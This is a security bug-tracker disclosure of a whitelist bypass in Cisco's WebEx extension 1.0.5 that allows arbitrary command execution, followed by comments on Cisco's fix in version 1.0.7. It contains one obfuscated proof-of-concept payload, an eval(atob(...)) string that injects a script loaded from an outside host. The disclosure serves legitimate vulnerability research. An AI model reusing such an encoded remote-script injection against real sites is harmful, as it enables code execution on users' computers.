New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 1100 link

Starred by 2 users

Issue metadata

Status: Fixed
Closed: Jan 2017

Blocked on:
issue 1324

issue 1096

Sign in to add a comment

Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass

Project Member Reported by, Jan 25 2017

Issue description

In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing  issue 1096 .

This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit.

This requires an XSS on *, but they're unfortunately not difficult to find.

Here is a working example:");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));("

(The eval just loads this script:

Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Windows 10-2017-01-24-19-23-30.png
822 KB View Download
Project Member

Comment 1 by, Jan 25 2017

Project Member

Comment 2 by, Jan 25 2017

Project Member

Comment 3 by, Jan 25 2017

I made some minor changes to the exploit script.
7.1 KB View Download
Project Member

Comment 4 by, Jan 26 2017


Hi Tavis,
We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further.


Project Member

Comment 5 by, Jan 26 2017

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit.

It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement.

Another very quick response from Cisco, I continue to be impressed with Cisco's response time.

I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed.

(Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public).
Project Member

Comment 6 by, Jan 26 2017

Cisco's advisory is here

Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
Project Member

Comment 7 by, Feb 3 2017

Labels: -Reported-2017-01-24 Reported-2017-Jan-24

Comment 8 Deleted

Comment 9 Deleted

Comment 10 Deleted

Project Member

Comment 11 by, Jul 6 2017

Blockedon: 1324

Sign in to add a comment